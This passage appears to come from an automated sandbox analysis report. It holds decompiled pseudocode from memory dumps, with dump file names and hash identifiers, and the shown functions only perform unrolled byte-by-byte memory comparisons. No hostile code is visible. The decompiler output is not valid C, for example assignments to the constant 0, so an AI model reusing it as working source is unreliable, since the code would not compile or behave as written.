          							if(_t241 != 0) {
          								goto L2;
          							}
          							goto L23;
          						}
          						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
          						if(_t241 != 0) {
          							goto L2;
          						}
          						goto L21;
          					}
          					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
          					if(_t241 != 0) {
          						goto L2;
          					}
          					goto L19;
          				} else {
          					__edi = __al & 0x000000ff;
          					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
          					if(__edi == 0) {
          						L8:
          						__edi =  *(__esi - 0x1d) & 0x000000ff;
          						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
          						if(__edi == 0) {
          							L10:
          							__edi =  *(__esi - 0x1c) & 0x000000ff;
          							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
          							if(__edi == 0) {
          								L12:
          								__ecx =  *(__esi - 0x1b) & 0x000000ff;
          								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
          								if(__ecx != 0) {
          									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
          								}
          								goto L15;
          							}
          							0 = 0 | __edi > 0x00000000;
          							__ecx = (__edi > 0) * 2 != 1;
          							if((__edi > 0) * 2 != 1) {
          								L2:
          								_t192 = _t241;
          								return _t192;
          							}
          							goto L12;
          						}
          						0 = 0 | __edi > 0x00000000;
          						__ecx = (__edi > 0) * 2 != 1;
          						if((__edi > 0) * 2 != 1) {
          							goto L2;
          						}
          						goto L10;
          					}
          					0 = 0 | __edi > 0x00000000;
          					__ecx = (__edi > 0) * 2 != 1;
          					if((__edi > 0) * 2 != 1) {
          						goto L2;
          					}
          					goto L8;
          				}
          			}































          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
          • Instruction ID: 4c13f62c78c5a9b44ef031dbe350faf9e3185100ab0a33bc143cdfa1dabe1122
          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
          • Instruction Fuzzy Hash: 82C1FA732251970AEF6D8A39857507EBAE16EB17B131A036ED8B3CB4C1FE60C5B4D520
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00210548(void* __edx, void* __esi) {
          				signed int _t197;
          				signed char _t198;
          				signed char _t199;
          				signed char _t200;
          				signed char _t202;
          				signed char _t203;
          				signed int _t246;
          				void* _t294;
          				void* _t297;
          				void* _t299;
          				void* _t301;
          				void* _t303;
          				void* _t305;
          				void* _t307;
          				void* _t309;
          				void* _t311;
          				void* _t313;
          				void* _t315;
          				void* _t317;
          				void* _t319;
          				void* _t321;
          				void* _t323;
          				void* _t325;
          				void* _t327;
          				void* _t329;
          				void* _t331;
          				void* _t333;
          				void* _t335;
          				void* _t336;
          
          				_t336 = __esi;
          				_t294 = __edx;
          				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
          					_t246 = 0;
          					L14:
          					if(_t246 != 0) {
          						goto L1;
          					}
          					_t198 =  *(_t336 - 0x1b);
          					if(_t198 ==  *(_t294 - 0x1b)) {
          						_t246 = 0;
          						L25:
          						if(_t246 != 0) {
          							goto L1;
          						}
          						_t199 =  *(_t336 - 0x17);
          						if(_t199 ==  *(_t294 - 0x17)) {
          							_t246 = 0;
          							L36:
          							if(_t246 != 0) {
          								goto L1;
          							}
          							_t200 =  *(_t336 - 0x13);
          							if(_t200 ==  *(_t294 - 0x13)) {
          								_t246 = 0;
          								L47:
          								if(_t246 != 0) {
          									goto L1;
          								}
          								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
          									_t246 = 0;
          									L58:
          									if(_t246 != 0) {
          										goto L1;
          									}
          									_t202 =  *(_t336 - 0xb);
          									if(_t202 ==  *(_t294 - 0xb)) {
          										_t246 = 0;
          										L69:
          										if(_t246 != 0) {
          											goto L1;
          										}
          										_t203 =  *(_t336 - 7);
          										if(_t203 ==  *(_t294 - 7)) {
          											_t246 = 0;
          											L80:
          											if(_t246 != 0) {
          												goto L1;
          											}
          											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
          											if(_t297 == 0) {
          												L83:
          												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
          												if(_t299 == 0) {
          													L3:
          													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
          													if(_t246 != 0) {
          														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          													}
          													goto L1;
          												}
          												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
          												if(_t246 != 0) {
          													goto L1;
          												} else {
          													goto L3;
          												}
          											}
          											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
          											if(_t246 != 0) {
          												goto L1;
          											}
          											goto L83;
          										}
          										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
          										if(_t301 == 0) {
          											L73:
          											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
          											if(_t303 == 0) {
          												L75:
          												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
          												if(_t305 == 0) {
          													L77:
          													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
          													if(_t246 != 0) {
          														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          													}
          													goto L80;
          												}
          												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
          												if(_t246 != 0) {
          													goto L1;
          												}
          												goto L77;
          											}
          											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
          											if(_t246 != 0) {
          												goto L1;
          											}
          											goto L75;
          										}
          										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
          										if(_t246 != 0) {
          											goto L1;
          										}
          										goto L73;
          									}
          									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
          									if(_t307 == 0) {
          										L62:
          										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
          										if(_t309 == 0) {
          											L64:
          											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
          											if(_t311 == 0) {
          												L66:
          												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
          												if(_t246 != 0) {
          													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          												}
          												goto L69;
          											}
          											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
          											if(_t246 != 0) {
          												goto L1;
          											}
          											goto L66;
          										}
          										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
          										if(_t246 != 0) {
          											goto L1;
          										}
          										goto L64;
          									}
          									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
          									if(_t246 != 0) {
          										goto L1;
          									}
          									goto L62;
          								}
          								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
          								if(_t313 == 0) {
          									L51:
          									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
          									if(_t315 == 0) {
          										L53:
          										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
          										if(_t317 == 0) {
          											L55:
          											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
          											if(_t246 != 0) {
          												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          											}
          											goto L58;
          										}
          										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
          										if(_t246 != 0) {
          											goto L1;
          										}
          										goto L55;
          									}
          									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
          									if(_t246 != 0) {
          										goto L1;
          									}
          									goto L53;
          								}
          								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
          								if(_t246 != 0) {
          									goto L1;
          								}
          								goto L51;
          							}
          							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
          							if(_t319 == 0) {
          								L40:
          								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
          								if(_t321 == 0) {
          									L42:
          									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
          									if(_t323 == 0) {
          										L44:
          										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
          										if(_t246 != 0) {
          											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          										}
          										goto L47;
          									}
          									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
          									if(_t246 != 0) {
          										goto L1;
          									}
          									goto L44;
          								}
          								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
          								if(_t246 != 0) {
          									goto L1;
          								}
          								goto L42;
          							}
          							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
          							if(_t246 != 0) {
          								goto L1;
          							}
          							goto L40;
          						}
          						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
          						if(_t325 == 0) {
          							L29:
          							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
          							if(_t327 == 0) {
          								L31:
          								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
          								if(_t329 == 0) {
          									L33:
          									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
          									if(_t246 != 0) {
          										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          									}
          									goto L36;
          								}
          								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
          								if(_t246 != 0) {
          									goto L1;
          								}
          								goto L33;
          							}
          							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
          							if(_t246 != 0) {
          								goto L1;
          							}
          							goto L31;
          						}
          						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
          						if(_t246 != 0) {
          							goto L1;
          						}
          						goto L29;
          					}
          					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
          					if(_t331 == 0) {
          						L18:
          						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
          						if(_t333 == 0) {
          							L20:
          							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
          							if(_t335 == 0) {
          								L22:
          								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
          								if(_t246 != 0) {
          									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
          								}
          								goto L25;
          							}
          							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
          							if(_t246 != 0) {
          								goto L1;
          							}
          							goto L22;
          						}
          						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
          						if(_t246 != 0) {
          							goto L1;
          						}
          						goto L20;
          					}
          					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
          					if(_t246 != 0) {
          						goto L1;
          					}
          					goto L18;
          				} else {
          					__edi =  *(__esi - 0x1f) & 0x000000ff;
          					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
          					if(__edi == 0) {
          						L7:
          						__edi =  *(__esi - 0x1e) & 0x000000ff;
          						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
          						if(__edi == 0) {
          							L9:
          							__edi =  *(__esi - 0x1d) & 0x000000ff;
          							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
          							if(__edi == 0) {
          								L11:
          								__ecx =  *(__esi - 0x1c) & 0x000000ff;
          								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
          								if(__ecx != 0) {
          									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
          								}
          								goto L14;
          							}
          							0 = 0 | __edi > 0x00000000;
          							__ecx = (__edi > 0) * 2 != 1;
          							if((__edi > 0) * 2 != 1) {
          								goto L1;
          							}
          							goto L11;
          						}
          						0 = 0 | __edi > 0x00000000;
          						__ecx = (__edi > 0) * 2 != 1;
          						if((__edi > 0) * 2 != 1) {
          							goto L1;
          						}
          						goto L9;
          					}
          					0 = 0 | __edi > 0x00000000;
          					__ecx = (__edi > 0) * 2 != 1;
          					if((__edi > 0) * 2 != 1) {
          						goto L1;
          					}
          					goto L7;
          				}
          				L1:
          				_t197 = _t246;
          				return _t197;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
          • Instruction ID: 2d115d515a3772577035d23048d04dc48210db00435a76b029833639a8c70e19
          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
          • Instruction Fuzzy Hash: E2C1F8731151970AEF6D8A39857407EFAE16AB27B131A036ED8B2CB4C5FE50C5B4D520
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020FCDE(void* __edx, void* __esi) {
          				signed int _t184;
          				signed char _t185;
          				signed char _t186;
          				signed char _t187;
          				signed char _t188;
          				signed char _t190;
          				signed int _t231;
          				void* _t275;
          				void* _t278;
          				void* _t280;
          				void* _t282;
          				void* _t284;
          				void* _t286;
          				void* _t288;
          				void* _t290;
          				void* _t292;
          				void* _t294;
          				void* _t296;
          				void* _t298;
          				void* _t300;
          				void* _t302;
          				void* _t304;
          				void* _t306;
          				void* _t308;
          				void* _t310;
          				void* _t312;
          				void* _t313;
          
          				_t313 = __esi;
          				_t275 = __edx;
          				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
          					_t231 = 0;
          					L11:
          					if(_t231 != 0) {
          						goto L1;
          					}
          					_t185 =  *(_t313 - 0x19);
          					if(_t185 ==  *(_t275 - 0x19)) {
          						_t231 = 0;
          						L22:
          						if(_t231 != 0) {
          							goto L1;
          						}
          						_t186 =  *(_t313 - 0x15);
          						if(_t186 ==  *(_t275 - 0x15)) {
          							_t231 = 0;
          							L33:
          							if(_t231 != 0) {
          								goto L1;
          							}
          							_t187 =  *(_t313 - 0x11);
          							if(_t187 ==  *(_t275 - 0x11)) {
          								_t231 = 0;
          								L44:
          								if(_t231 != 0) {
          									goto L1;
          								}
          								_t188 =  *(_t313 - 0xd);
          								if(_t188 ==  *(_t275 - 0xd)) {
          									_t231 = 0;
          									L55:
          									if(_t231 != 0) {
          										goto L1;
          									}
          									if( *(_t313 - 9) ==  *(_t275 - 9)) {
          										_t231 = 0;
          										L66:
          										if(_t231 != 0) {
          											goto L1;
          										}
          										_t190 =  *(_t313 - 5);
          										if(_t190 ==  *(_t275 - 5)) {
          											_t231 = 0;
          											L77:
          											if(_t231 == 0) {
          												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
          												if(_t231 != 0) {
          													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          												}
          											}
          											goto L1;
          										}
          										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
          										if(_t278 == 0) {
          											L70:
          											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
          											if(_t280 == 0) {
          												L72:
          												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
          												if(_t282 == 0) {
          													L74:
          													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
          													if(_t231 != 0) {
          														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          													}
          													goto L77;
          												}
          												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
          												if(_t231 != 0) {
          													goto L1;
          												}
          												goto L74;
          											}
          											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
          											if(_t231 != 0) {
          												goto L1;
          											}
          											goto L72;
          										}
          										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
          										if(_t231 != 0) {
          											goto L1;
          										}
          										goto L70;
          									}
          									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
          									if(_t284 == 0) {
          										L59:
          										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
          										if(_t286 == 0) {
          											L61:
          											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
          											if(_t288 == 0) {
          												L63:
          												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
          												if(_t231 != 0) {
          													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          												}
          												goto L66;
          											}
          											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
          											if(_t231 != 0) {
          												goto L1;
          											}
          											goto L63;
          										}
          										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
          										if(_t231 != 0) {
          											goto L1;
          										}
          										goto L61;
          									}
          									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
          									if(_t231 != 0) {
          										goto L1;
          									}
          									goto L59;
          								}
          								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
          								if(_t290 == 0) {
          									L48:
          									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
          									if(_t292 == 0) {
          										L50:
          										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
          										if(_t294 == 0) {
          											L52:
          											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
          											if(_t231 != 0) {
          												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          											}
          											goto L55;
          										}
          										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
          										if(_t231 != 0) {
          											goto L1;
          										}
          										goto L52;
          									}
          									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
          									if(_t231 != 0) {
          										goto L1;
          									}
          									goto L50;
          								}
          								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
          								if(_t231 != 0) {
          									goto L1;
          								}
          								goto L48;
          							}
          							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
          							if(_t296 == 0) {
          								L37:
          								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
          								if(_t298 == 0) {
          									L39:
          									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
          									if(_t300 == 0) {
          										L41:
          										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
          										if(_t231 != 0) {
          											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          										}
          										goto L44;
          									}
          									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
          									if(_t231 != 0) {
          										goto L1;
          									}
          									goto L41;
          								}
          								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
          								if(_t231 != 0) {
          									goto L1;
          								}
          								goto L39;
          							}
          							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
          							if(_t231 != 0) {
          								goto L1;
          							}
          							goto L37;
          						}
          						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
          						if(_t302 == 0) {
          							L26:
          							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
          							if(_t304 == 0) {
          								L28:
          								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
          								if(_t306 == 0) {
          									L30:
          									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
          									if(_t231 != 0) {
          										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          									}
          									goto L33;
          								}
          								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
          								if(_t231 != 0) {
          									goto L1;
          								}
          								goto L30;
          							}
          							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
          							if(_t231 != 0) {
          								goto L1;
          							}
          							goto L28;
          						}
          						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
          						if(_t231 != 0) {
          							goto L1;
          						}
          						goto L26;
          					}
          					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
          					if(_t308 == 0) {
          						L15:
          						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
          						if(_t310 == 0) {
          							L17:
          							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
          							if(_t312 == 0) {
          								L19:
          								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
          								if(_t231 != 0) {
          									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
          								}
          								goto L22;
          							}
          							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
          							if(_t231 != 0) {
          								goto L1;
          							}
          							goto L19;
          						}
          						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
          						if(_t231 != 0) {
          							goto L1;
          						}
          						goto L17;
          					}
          					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
          					if(_t231 != 0) {
          						goto L1;
          					}
          					goto L15;
          				} else {
          					__edi = __al & 0x000000ff;
          					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
          					if(__edi == 0) {
          						L4:
          						__edi =  *(__esi - 0x1c) & 0x000000ff;
          						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
          						if(__edi == 0) {
          							L6:
          							__edi =  *(__esi - 0x1b) & 0x000000ff;
          							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
          							if(__edi == 0) {
          								L8:
          								__ecx =  *(__esi - 0x1a) & 0x000000ff;
          								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
          								if(__ecx != 0) {
          									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
          								}
          								goto L11;
          							}
          							0 = 0 | __edi > 0x00000000;
          							__ecx = (__edi > 0) * 2 != 1;
          							if((__edi > 0) * 2 != 1) {
          								goto L1;
          							}
          							goto L8;
          						}
          						0 = 0 | __edi > 0x00000000;
          						__ecx = (__edi > 0) * 2 != 1;
          						if((__edi > 0) * 2 != 1) {
          							goto L1;
          						}
          						goto L6;
          					}
          					0 = 0 | __edi > 0x00000000;
          					__ecx = (__edi > 0) * 2 != 1;
          					if((__edi > 0) * 2 != 1) {
          						goto L1;
          					}
          					goto L4;
          				}
          				L1:
          				_t184 = _t231;
          				return _t184;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
          • Instruction ID: 6aeaa0befad951c6b7e4dc199060da7556381169cd062a490e243ad4f03b7407
          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
          • Instruction Fuzzy Hash: FDC1E9732552570AEFBD8A39C67403EBAA05AA27B131A037ED8B2CB8C6FE50C574D510
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020F8C6(void* __edx, void* __esi) {
          				signed char _t177;
          				void* _t178;
          				signed char _t179;
          				signed char _t180;
          				signed char _t181;
          				signed char _t183;
          				signed char _t184;
          				void* _t228;
          				void* _t278;
          				void* _t281;
          				void* _t283;
          				void* _t285;
          				void* _t287;
          				void* _t289;
          				void* _t291;
          				void* _t293;
          				void* _t295;
          				void* _t297;
          				void* _t299;
          				void* _t301;
          				void* _t303;
          				void* _t305;
          				void* _t307;
          				void* _t309;
          				void* _t311;
          				void* _t313;
          				void* _t315;
          				void* _t317;
          				void* _t319;
          				void* _t321;
          				void* _t322;
          
          				_t322 = __esi;
          				_t278 = __edx;
          				_t177 =  *(__esi - 0x1c);
          				if(_t177 ==  *(__edx - 0x1c)) {
          					_t228 = 0;
          					L10:
          					if(_t228 != 0) {
          						L78:
          						_t178 = _t228;
          						return _t178;
          					}
          					_t179 =  *(_t322 - 0x18);
          					if(_t179 ==  *(_t278 - 0x18)) {
          						_t228 = 0;
          						L21:
          						if(_t228 != 0) {
          							goto L78;
          						}
          						_t180 =  *(_t322 - 0x14);
          						if(_t180 ==  *(_t278 - 0x14)) {
          							_t228 = 0;
          							L32:
          							if(_t228 != 0) {
          								goto L78;
          							}
          							_t181 =  *(_t322 - 0x10);
          							if(_t181 ==  *(_t278 - 0x10)) {
          								_t228 = 0;
          								L43:
          								if(_t228 != 0) {
          									goto L78;
          								}
          								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
          									_t228 = 0;
          									L54:
          									if(_t228 != 0) {
          										goto L78;
          									}
          									_t183 =  *(_t322 - 8);
          									if(_t183 ==  *(_t278 - 8)) {
          										_t228 = 0;
          										L65:
          										if(_t228 != 0) {
          											goto L78;
          										}
          										_t184 =  *(_t322 - 4);
          										if(_t184 ==  *(_t278 - 4)) {
          											_t228 = 0;
          											L76:
          											if(_t228 == 0) {
          												_t228 = 0;
          											}
          											goto L78;
          										}
          										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
          										if(_t281 == 0) {
          											L69:
          											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
          											if(_t283 == 0) {
          												L71:
          												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
          												if(_t285 == 0) {
          													L73:
          													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
          													if(_t228 != 0) {
          														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          													}
          													goto L76;
          												}
          												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
          												if(_t228 != 0) {
          													goto L78;
          												}
          												goto L73;
          											}
          											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
          											if(_t228 != 0) {
          												goto L78;
          											}
          											goto L71;
          										}
          										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
          										if(_t228 != 0) {
          											goto L78;
          										}
          										goto L69;
          									}
          									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
          									if(_t287 == 0) {
          										L58:
          										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
          										if(_t289 == 0) {
          											L60:
          											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
          											if(_t291 == 0) {
          												L62:
          												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
          												if(_t228 != 0) {
          													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
          												}
          												goto L65;
          											}
          											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
          											if(_t228 != 0) {
          												goto L78;
          											}
          											goto L62;
          										}
          										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
          										if(_t228 != 0) {
          											goto L78;
          										}
          										goto L60;
          									}
